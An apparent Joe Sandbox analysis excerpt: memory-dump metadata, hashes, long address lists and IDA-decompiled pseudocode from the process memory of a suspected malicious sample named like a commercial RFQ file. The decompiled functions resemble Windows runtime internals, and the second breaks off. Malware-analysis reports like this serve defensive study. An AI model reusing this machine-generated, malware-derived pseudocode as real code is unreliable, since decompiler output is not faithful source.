                                                                                                                                                                                  0x3334864a
                                                                                                                                                                                  0x3334864c
                                                                                                                                                                                  0x3334864c
                                                                                                                                                                                  0x33348654
                                                                                                                                                                                  0x3334865c
                                                                                                                                                                                  0x33348668
                                                                                                                                                                                  0x33348670
                                                                                                                                                                                  0x3334867c
                                                                                                                                                                                  0x33348684
                                                                                                                                                                                  0x33348693
                                                                                                                                                                                  0x33348698
                                                                                                                                                                                  0x333486a0
                                                                                                                                                                                  0x333ab409
                                                                                                                                                                                  0x333ab414
                                                                                                                                                                                  0x333ab414
                                                                                                                                                                                  0x333486aa
                                                                                                                                                                                  0x333ab424
                                                                                                                                                                                  0x333ab424
                                                                                                                                                                                  0x333486b3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333486b5
                                                                                                                                                                                  0x333485ed
                                                                                                                                                                                  0x333485f6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33348604
                                                                                                                                                                                  0x33348607
                                                                                                                                                                                  0x33348608
                                                                                                                                                                                  0x3334860c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334860c
                                                                                                                                                                                  0x33348559
                                                                                                                                                                                  0x3334855e
                                                                                                                                                                                  0x33348561
                                                                                                                                                                                  0x33348567
                                                                                                                                                                                  0x3334856d
                                                                                                                                                                                  0x33348570
                                                                                                                                                                                  0x33348575
                                                                                                                                                                                  0x333ab3b7
                                                                                                                                                                                  0x333ab3bc
                                                                                                                                                                                  0x333ab3ce
                                                                                                                                                                                  0x333ab3d3
                                                                                                                                                                                  0x333ab3d8
                                                                                                                                                                                  0x333ab3dc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ab3dc
                                                                                                                                                                                  0x33348583
                                                                                                                                                                                  0x3334858b
                                                                                                                                                                                  0x33348590
                                                                                                                                                                                  0x33348595
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33348595
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33348522
                                                                                                                                                                                  0x3334851c
                                                                                                                                                                                  0x33348463
                                                                                                                                                                                  0x3334844e
                                                                                                                                                                                  0x33348439
                                                                                                                                                                                  0x33348424
                                                                                                                                                                                  0x3334840c
                                                                                                                                                                                  0x333483f2
                                                                                                                                                                                  0x333483aa
                                                                                                                                                                                  0x333483ac
                                                                                                                                                                                  0x333483b6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333483c4
                                                                                                                                                                                  0x333483cc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333483d4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333483da
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333483da
                                                                                                                                                                                  0x333483b6

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 80c2371eede1da7c4adc4cc8544e44b714ebe053741dd5696a277c00bba587e4
                                                                                                                                                                                  • Instruction ID: 263f80f41496998456aa4bf5f36274954aab06f8c168ce9c260b93e3ca03ff1b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 80c2371eede1da7c4adc4cc8544e44b714ebe053741dd5696a277c00bba587e4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 81D1CD75E0031A9BEB04CF68C8D0AAA77E9EF44745F48C229F955DF280EB35D985CB60
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3335D700 Relevance: .3, Instructions: 342COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                                  			E3335D700(signed int __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v13;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* __ebp;
				signed int _t114;
				signed int _t115;
				signed int _t118;
				signed char _t121;
				signed int _t123;
				signed int _t125;
				signed int _t127;
				signed int _t128;
				signed int _t131;
				signed int _t136;
				signed int _t142;
				intOrPtr _t145;
				signed char _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				signed char _t151;
				signed int _t154;
				signed int* _t160;
				signed int _t165;
				signed int _t168;
				signed int _t171;
				signed int _t172;
				signed int _t175;
				signed char _t179;
				intOrPtr _t180;
				signed int _t182;
				signed int _t191;
				signed int _t192;
				signed int _t198;
				signed int* _t201;
				signed int _t203;
				void* _t206;
				signed int _t208;
				signed int _t213;
				void* _t218;

				_t190 = __edx;
				_v8 =  *((intOrPtr*)(_t218 + 4));
				_t201 = __edx;
				_v32 = 0;
				_t208 = __ecx;
				_v20 = __edx;
				_v24 = __ecx;
				 *((intOrPtr*)(__edx + 4)) = 0;
				 *((intOrPtr*)(__edx + 8)) = 0;
				if( *0x334465f4 != 3) {
					L14:
					_push(0);
					_push(0xc);
					_push( &_v60);
					_push(6);
					_push(_t208);
					_push(0xffffffff);
					_t114 = E33392BE0();
					__eflags = _t114;
					if(_t114 < 0) {
						L69:
						_t168 = 0;
						_v24 = 0;
						L19:
						_t201[1] = _t168;
						__eflags = _t168;
						if(_t168 == 0) {
							_t191 = _v32;
							L41:
							_t115 = _t191;
							L13:
							return _t115;
						}
						_v28 = 0;
						E3335E580("true", _t168, 0, 0,  &_v28);
						_t118 = _v28;
						__eflags =  *(_t118 + 0x5e) & 0x00000400;
						if(( *(_t118 + 0x5e) & 0x00000400) != 0) {
							L48:
							_t192 = _t190 | 0xffffffff;
							_t115 = _t192;
							_t201[3] = _t208 | _t192;
							 *_t201 = _t192;
							goto L13;
						}
						E3335E580("true", _v24, 0, 0,  &_v48);
						_t121 = _v24;
						_t208 = 0;
						_v13 = 1;
						_t171 = _t121;
						_v20 = _t171;
						_v36 = 0;
						_v40 = 0;
						__eflags = _t121 & 0x00000003;
						if((_t121 & 0x00000003) != 0) {
							_t171 = _t171 & 0xfffffffc;
							_t142 =  !_t121 & 0x00000001;
							__eflags = _t142;
							_v20 = _t171;
							_v13 = _t142;
						}
						_t123 = E3335E580("true", _t171, 0, 0,  &_v36);
						_t172 = _v36;
						__eflags = _t172;
						if(_t172 == 0) {
							L77:
							__eflags = _t123;
							if(__eflags < 0) {
								goto L72;
							}
							goto L78;
						} else {
							_t136 =  *(_t172 + 0x18) & 0x0000ffff;
							_t190 = 0x10b;
							__eflags = _t136 - 0x10b;
							if(_t136 != 0x10b) {
								_t190 = 0x20b;
								__eflags = _t136 - 0x20b;
								if(__eflags != 0) {
									L72:
									_t125 = E3335DE20(_v24, __eflags, _v24, "true", 0xe,  &_v20);
									__eflags = _t125;
									if(_t125 == 0) {
										L74:
										_t191 = 0;
										L40:
										_t201[3] = 0;
										 *_t201 = _t191;
										goto L41;
									}
									__eflags =  *(_t125 + 0x10) & 0x00000001;
									if(( *(_t125 + 0x10) & 0x00000001) != 0) {
										goto L48;
									}
									goto L74;
								}
								_t190 = _v13;
								_t123 = E33347386(_v20, _t190, 0xa,  &_v44, _t172,  &_v40);
								_t208 = _v40;
								goto L77;
							}
							__eflags =  *((intOrPtr*)(_t172 + 0x74)) - 0xa;
							if(__eflags <= 0) {
								goto L72;
							}
							_t208 =  *(_t172 + 0xc8);
							__eflags = _t208;
							if(__eflags == 0) {
								goto L72;
							}
							__eflags = _v13;
							_t190 =  *(_t172 + 0xcc);
							_v44 = _t190;
							if(_v13 == 0) {
								__eflags = _t208 -  *((intOrPtr*)(_t172 + 0x54));
								if(_t208 <  *((intOrPtr*)(_t172 + 0x54))) {
									goto L28;
								}
								_t208 = E33359630(_t172, _v20, _t208);
								__eflags = _t208;
								if(__eflags != 0) {
									L78:
									_t190 = _v44;
									L29:
									__eflags = _t208;
									if(__eflags == 0) {
										goto L72;
									}
									__eflags = _t190;
									if(__eflags == 0) {
										goto L72;
									}
									__eflags = _t190 - 0x40;
									if(_t190 == 0x40) {
										L33:
										_t127 =  *(_v48 + 4) & 0x0000ffff;
										__eflags = _t127 - 0x3a64;
										if(_t127 == 0x3a64) {
											L35:
											__eflags =  *_t208 - 0x48;
											if(__eflags < 0) {
												goto L72;
											}
											_t190 =  *(_t208 + 0x40);
											__eflags = _t190;
											if(__eflags == 0) {
												goto L72;
											}
											_t208 =  *(_t208 + 0x44);
											__eflags = _t208;
											if(__eflags == 0) {
												goto L72;
											}
											_t128 = _v28;
											_t175 = _v24;
											__eflags = _t190 -  *((intOrPtr*)(_t128 + 0x54)) + _t175;
											if(_t190 <  *((intOrPtr*)(_t128 + 0x54)) + _t175) {
												goto L48;
											}
											_t131 = _v28;
											__eflags = _t208 -  *((intOrPtr*)(_t131 + 0x50)) - _t190 + _t175 >> 2;
											if(_t208 >  *((intOrPtr*)(_t131 + 0x50)) - _t190 + _t175 >> 2) {
												goto L48;
											}
											goto L40;
										}
										__eflags = _t127 - 0x14c;
										if(__eflags != 0) {
											goto L72;
										}
										goto L35;
									}
									__eflags = _t190 -  *_t208;
									if(__eflags != 0) {
										goto L72;
									}
									goto L33;
								}
								goto L72;
							}
							L28:
							_t208 = _t208 + _v20;
							__eflags = _t208;
							goto L29;
						}
					}
					_t168 = _v60;
					_v24 = _t168;
					__eflags = _t168;
					if(_t168 == 0) {
						goto L69;
					}
					__eflags = _v52 & 0x00000003;
					if((_v52 & 0x00000003) != 0) {
						goto L69;
					}
					__eflags = _t208 - _t168;
					if(_t208 < _t168) {
						goto L69;
					}
					_t201[2] = _v56;
					goto L19;
				}
				L333553C0(0x3344681c);
				_t145 =  *0x33449360; // 0x3e
				if(_t145 == 1) {
					L11:
					_t190 = 0x3344681c;
					_t146 = 0x11;
					asm("lock cmpxchg [edx], ecx");
					_t179 = 0x11;
					if(0x11 != 0x11) {
						__eflags = 1;
						if(1 == 0) {
							_t146 = E333A8AA0(0x11, 0x3344681c, 0xc0000264);
							L55:
							__eflags = _t179 & 0x00000008;
							if((_t179 & 0x00000008) == 0) {
								_t147 = _t146 | 0xffffffff;
								__eflags = _t147;
								_v28 = _t147;
								L61:
								_t203 = _v28;
								while(1) {
									_t149 = _t179 & 0x00000006;
									_v40 = _t149;
									__eflags = _t149 - 2;
									_t150 = _t203 + 4;
									if(_t149 != 2) {
										_t150 = _t203;
									}
									_t190 = _t179 + _t150;
									_t151 = _t179;
									asm("lock cmpxchg [edi], esi");
									_t203 = _v28;
									__eflags = _t151 - _t179;
									if(_t151 == _t179) {
										break;
									}
									_t179 = _t151;
								}
								__eflags = _v40 - 2;
								_t201 = _v20;
								if(_v40 == 2) {
									_t190 = 0;
									__eflags = 0;
									E33383BDB(0x3344681c, 0, 0);
								}
								_t208 = _v24;
								goto L12;
							}
							_t154 = _t179 & 0xfffffff0;
							_t190 =  *(_t154 + 4);
							__eflags = _t190;
							if(_t190 != 0) {
								L58:
								asm("lock xadd [edx+0x10], eax");
								__eflags = (_t154 | 0xffffffff) - 1;
								if((_t154 | 0xffffffff) - 1 > 0) {
									goto L12;
								}
								_v28 = 0xfffffff7;
								goto L61;
							} else {
								goto L57;
							}
							do {
								L57:
								_t154 =  *_t154;
								_t190 =  *(_t154 + 4);
								__eflags = _t190;
							} while (_t190 == 0);
							goto L58;
						}
						__eflags = 0;
						if(0 != 0) {
							goto L55;
						}
						while(1) {
							asm("sbb edx, edx");
							_t190 =  ~((_t179 & 0xfffffff0) - 0x10) & _t179 - 0x00000010;
							_t146 = _t179;
							asm("lock cmpxchg [edi], edx");
							_t201 = _v20;
							__eflags = _t146 - _t179;
							if(_t146 == _t179) {
								goto L12;
							}
							_t179 = _t146;
							__eflags = _t146 & 0x00000002;
							if((_t146 & 0x00000002) == 0) {
								continue;
							}
							goto L55;
						}
					}
					L12:
					_t115 = _v32;
					if(_t115 == 0) {
						__eflags =  *0x3344936c;
						if( *0x3344936c != 0) {
							goto L14;
						}
						_t180 =  *[fs:0x30];
						__eflags =  *(_t180 + 0x28) & 0x00000080;
						if(( *(_t180 + 0x28) & 0x00000080) == 0) {
							goto L13;
						}
						goto L14;
					}
					goto L13;
				}
				_t182 = 1;
				_t8 = _t145 - 1; // 0x3d
				_t206 = _t8;
				if(_t206 < 1) {
					L53:
					_t201 = _v20;
					goto L11;
				} else {
					goto L3;
				}
				do {
					L3:
					_t198 = _t182 + _t206 >> 1;
					_t160 = (_t198 << 4) + 0x33449370;
					_t213 = _t160[1];
					if(_v24 < _t213) {
						_t208 = _v24;
						__eflags = _t198;
						if(_t198 == 0) {
							goto L53;
						}
						_t206 = _t198 - 1;
						goto L6;
					}
					_t208 = _v24;
					if(_t208 < _t160[2] + _t213) {
						_t201 = _v20;
						 *_t201 =  *_t160;
						_t201[1] = _t160[1];
						_t201[2] = _t160[2];
						_t201[3] = _t160[3];
						asm("ror eax, cl");
						_t165 =  *_t201 ^  *0x7ffe0330;
						__eflags = _t165;
						_v32 = _t165;
						 *_t201 = _t165;
						goto L11;
					}
					_t182 = _t198 + 1;
					L6:
				} while (_t206 >= _t182);
				goto L53;
			}





















































                                                                                                                                                                                  0x3335d700
                                                                                                                                                                                  0x3335d712
                                                                                                                                                                                  0x3335d724
                                                                                                                                                                                  0x3335d726
                                                                                                                                                                                  0x3335d72d
                                                                                                                                                                                  0x3335d72f
                                                                                                                                                                                  0x3335d732
                                                                                                                                                                                  0x3335d735
                                                                                                                                                                                  0x3335d73c
                                                                                                                                                                                  0x3335d743
                                                                                                                                                                                  0x3335d815
                                                                                                                                                                                  0x3335d815
                                                                                                                                                                                  0x3335d817
                                                                                                                                                                                  0x3335d81c
                                                                                                                                                                                  0x3335d81d
                                                                                                                                                                                  0x3335d81f
                                                                                                                                                                                  0x3335d820
                                                                                                                                                                                  0x3335d822
                                                                                                                                                                                  0x3335d827
                                                                                                                                                                                  0x3335d829
                                                                                                                                                                                  0x333b3f8a
                                                                                                                                                                                  0x333b3f8a
                                                                                                                                                                                  0x333b3f8c
                                                                                                                                                                                  0x3335d855
                                                                                                                                                                                  0x3335d855
                                                                                                                                                                                  0x3335d858
                                                                                                                                                                                  0x3335d85a
                                                                                                                                                                                  0x3335da26
                                                                                                                                                                                  0x3335d9a0
                                                                                                                                                                                  0x3335d9a0
                                                                                                                                                                                  0x3335d80c
                                                                                                                                                                                  0x3335d814
                                                                                                                                                                                  0x3335d814
                                                                                                                                                                                  0x3335d863
                                                                                                                                                                                  0x3335d872
                                                                                                                                                                                  0x3335d877
                                                                                                                                                                                  0x3335d87f
                                                                                                                                                                                  0x3335d883
                                                                                                                                                                                  0x3335d9f2
                                                                                                                                                                                  0x3335d9f2
                                                                                                                                                                                  0x3335d9f7
                                                                                                                                                                                  0x3335d9f9
                                                                                                                                                                                  0x3335d9fc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d9fc
                                                                                                                                                                                  0x3335d897
                                                                                                                                                                                  0x3335d89c
                                                                                                                                                                                  0x3335d89f
                                                                                                                                                                                  0x3335d8a1
                                                                                                                                                                                  0x3335d8a5
                                                                                                                                                                                  0x3335d8a7
                                                                                                                                                                                  0x3335d8aa
                                                                                                                                                                                  0x3335d8b1
                                                                                                                                                                                  0x3335d8b4
                                                                                                                                                                                  0x3335d8b6
                                                                                                                                                                                  0x3335d8b8
                                                                                                                                                                                  0x3335d8bd
                                                                                                                                                                                  0x3335d8bd
                                                                                                                                                                                  0x3335d8bf
                                                                                                                                                                                  0x3335d8c2
                                                                                                                                                                                  0x3335d8c2
                                                                                                                                                                                  0x3335d8d0
                                                                                                                                                                                  0x3335d8d5
                                                                                                                                                                                  0x3335d8d8
                                                                                                                                                                                  0x3335d8da
                                                                                                                                                                                  0x333b3ff9
                                                                                                                                                                                  0x333b3ff9
                                                                                                                                                                                  0x333b3ffb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d8e0
                                                                                                                                                                                  0x3335d8e0
                                                                                                                                                                                  0x3335d8e4
                                                                                                                                                                                  0x3335d8e9
                                                                                                                                                                                  0x3335d8ec
                                                                                                                                                                                  0x333b3fd6
                                                                                                                                                                                  0x333b3fdb
                                                                                                                                                                                  0x333b3fde
                                                                                                                                                                                  0x333b3fae
                                                                                                                                                                                  0x333b3fba
                                                                                                                                                                                  0x333b3fbf
                                                                                                                                                                                  0x333b3fc1
                                                                                                                                                                                  0x333b3fcd
                                                                                                                                                                                  0x333b3fcd
                                                                                                                                                                                  0x3335d99b
                                                                                                                                                                                  0x3335d99b
                                                                                                                                                                                  0x3335d99e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d99e
                                                                                                                                                                                  0x333b3fc3
                                                                                                                                                                                  0x333b3fc7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b3fc7
                                                                                                                                                                                  0x333b3fe0
                                                                                                                                                                                  0x333b3ff1
                                                                                                                                                                                  0x333b3ff6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b3ff6
                                                                                                                                                                                  0x3335d8f2
                                                                                                                                                                                  0x3335d8f6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d8fc
                                                                                                                                                                                  0x3335d902
                                                                                                                                                                                  0x3335d904
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d90a
                                                                                                                                                                                  0x3335d90e
                                                                                                                                                                                  0x3335d914
                                                                                                                                                                                  0x3335d917
                                                                                                                                                                                  0x333b3f94
                                                                                                                                                                                  0x333b3f97
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b3fa8
                                                                                                                                                                                  0x333b3faa
                                                                                                                                                                                  0x333b3fac
                                                                                                                                                                                  0x333b3ffd
                                                                                                                                                                                  0x333b3ffd
                                                                                                                                                                                  0x3335d920
                                                                                                                                                                                  0x3335d920
                                                                                                                                                                                  0x3335d922
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d928
                                                                                                                                                                                  0x3335d92a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d930
                                                                                                                                                                                  0x3335d933
                                                                                                                                                                                  0x3335d93d
                                                                                                                                                                                  0x3335d945
                                                                                                                                                                                  0x3335d949
                                                                                                                                                                                  0x3335d94c
                                                                                                                                                                                  0x3335d95c
                                                                                                                                                                                  0x3335d95c
                                                                                                                                                                                  0x3335d95f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d965
                                                                                                                                                                                  0x3335d968
                                                                                                                                                                                  0x3335d96a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d970
                                                                                                                                                                                  0x3335d973
                                                                                                                                                                                  0x3335d975
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d97b
                                                                                                                                                                                  0x3335d97e
                                                                                                                                                                                  0x3335d986
                                                                                                                                                                                  0x3335d988
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d98a
                                                                                                                                                                                  0x3335d997
                                                                                                                                                                                  0x3335d999
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d999
                                                                                                                                                                                  0x3335d953
                                                                                                                                                                                  0x3335d956
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d956
                                                                                                                                                                                  0x3335d935
                                                                                                                                                                                  0x3335d937
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d937
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b3fac
                                                                                                                                                                                  0x3335d91d
                                                                                                                                                                                  0x3335d91d
                                                                                                                                                                                  0x3335d91d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d91d
                                                                                                                                                                                  0x3335d8da
                                                                                                                                                                                  0x3335d82f
                                                                                                                                                                                  0x3335d832
                                                                                                                                                                                  0x3335d835
                                                                                                                                                                                  0x3335d837
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d83d
                                                                                                                                                                                  0x3335d841
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d847
                                                                                                                                                                                  0x3335d849
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d852
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d852
                                                                                                                                                                                  0x3335d74e
                                                                                                                                                                                  0x3335d753
                                                                                                                                                                                  0x3335d75b
                                                                                                                                                                                  0x3335d7e6
                                                                                                                                                                                  0x3335d7e8
                                                                                                                                                                                  0x3335d7ed
                                                                                                                                                                                  0x3335d7f2
                                                                                                                                                                                  0x3335d7f6
                                                                                                                                                                                  0x3335d7fb
                                                                                                                                                                                  0x3335d9a7
                                                                                                                                                                                  0x3335d9aa
                                                                                                                                                                                  0x333b3efd
                                                                                                                                                                                  0x333b3f02
                                                                                                                                                                                  0x333b3f02
                                                                                                                                                                                  0x333b3f05
                                                                                                                                                                                  0x333b3f36
                                                                                                                                                                                  0x333b3f36
                                                                                                                                                                                  0x333b3f39
                                                                                                                                                                                  0x333b3f3c
                                                                                                                                                                                  0x333b3f3c
                                                                                                                                                                                  0x333b3f3f
                                                                                                                                                                                  0x333b3f41
                                                                                                                                                                                  0x333b3f44
                                                                                                                                                                                  0x333b3f47
                                                                                                                                                                                  0x333b3f4a
                                                                                                                                                                                  0x333b3f4d
                                                                                                                                                                                  0x333b3f4f
                                                                                                                                                                                  0x333b3f4f
                                                                                                                                                                                  0x333b3f51
                                                                                                                                                                                  0x333b3f5b
                                                                                                                                                                                  0x333b3f5d
                                                                                                                                                                                  0x333b3f61
                                                                                                                                                                                  0x333b3f64
                                                                                                                                                                                  0x333b3f66
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b3f68
                                                                                                                                                                                  0x333b3f68
                                                                                                                                                                                  0x333b3f6c
                                                                                                                                                                                  0x333b3f70
                                                                                                                                                                                  0x333b3f73
                                                                                                                                                                                  0x333b3f76
                                                                                                                                                                                  0x333b3f76
                                                                                                                                                                                  0x333b3f7d
                                                                                                                                                                                  0x333b3f7d
                                                                                                                                                                                  0x333b3f82
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b3f82
                                                                                                                                                                                  0x333b3f09
                                                                                                                                                                                  0x333b3f0c
                                                                                                                                                                                  0x333b3f0f
                                                                                                                                                                                  0x333b3f11
                                                                                                                                                                                  0x333b3f1c
                                                                                                                                                                                  0x333b3f1f
                                                                                                                                                                                  0x333b3f25
                                                                                                                                                                                  0x333b3f27
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b3f2d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b3f13
                                                                                                                                                                                  0x333b3f13
                                                                                                                                                                                  0x333b3f13
                                                                                                                                                                                  0x333b3f15
                                                                                                                                                                                  0x333b3f18
                                                                                                                                                                                  0x333b3f18
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b3f13
                                                                                                                                                                                  0x3335d9b0
                                                                                                                                                                                  0x3335d9b3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d9c0
                                                                                                                                                                                  0x3335d9d2
                                                                                                                                                                                  0x3335d9d4
                                                                                                                                                                                  0x3335d9d6
                                                                                                                                                                                  0x3335d9d8
                                                                                                                                                                                  0x3335d9dc
                                                                                                                                                                                  0x3335d9df
                                                                                                                                                                                  0x3335d9e1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d9e7
                                                                                                                                                                                  0x3335d9e9
                                                                                                                                                                                  0x3335d9eb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d9ed
                                                                                                                                                                                  0x3335d9c0
                                                                                                                                                                                  0x3335d801
                                                                                                                                                                                  0x3335d801
                                                                                                                                                                                  0x3335d806
                                                                                                                                                                                  0x3335da03
                                                                                                                                                                                  0x3335da0a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335da10
                                                                                                                                                                                  0x3335da17
                                                                                                                                                                                  0x3335da1b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335da21
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d806
                                                                                                                                                                                  0x3335d761
                                                                                                                                                                                  0x3335d766
                                                                                                                                                                                  0x3335d766
                                                                                                                                                                                  0x3335d76b
                                                                                                                                                                                  0x333b3ef0
                                                                                                                                                                                  0x333b3ef0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d771
                                                                                                                                                                                  0x3335d771
                                                                                                                                                                                  0x3335d774
                                                                                                                                                                                  0x3335d77b
                                                                                                                                                                                  0x3335d780
                                                                                                                                                                                  0x3335d786
                                                                                                                                                                                  0x3335d7a0
                                                                                                                                                                                  0x3335d7a3
                                                                                                                                                                                  0x3335d7a5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d7ab
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d7ab
                                                                                                                                                                                  0x3335d78d
                                                                                                                                                                                  0x3335d792
                                                                                                                                                                                  0x3335d7b2
                                                                                                                                                                                  0x3335d7b5
                                                                                                                                                                                  0x3335d7ba
                                                                                                                                                                                  0x3335d7c0
                                                                                                                                                                                  0x3335d7cb
                                                                                                                                                                                  0x3335d7dd
                                                                                                                                                                                  0x3335d7df
                                                                                                                                                                                  0x3335d7df
                                                                                                                                                                                  0x3335d7e1
                                                                                                                                                                                  0x3335d7e4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335d7e4
                                                                                                                                                                                  0x3335d794
                                                                                                                                                                                  0x3335d797
                                                                                                                                                                                  0x3335d797
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 559be6c4a66165d0b9372f7aec29712313eac74f96df6ddd6ff191ace3983861
                                                                                                                                                                                  • Instruction ID: 9ab2c142687ab8a147cf824ee2863b8bd9589195bd5a2b4d8f8bba09aa4e9282
                                                                                                                                                                                  • Opcode Fuzzy Hash: 559be6c4a66165d0b9372f7aec29712313eac74f96df6ddd6ff191ace3983861
                                                                                                                                                                                  • Instruction Fuzzy Hash: B9C1C075E017169FEF18CF58C840BAEB7B6EF84320F58C269E854AB690D770E941CB81
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33391763 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                                  			E33391763(intOrPtr __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t156;
				void* _t164;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t187;
				signed int _t191;
				signed int _t192;
				signed int _t193;
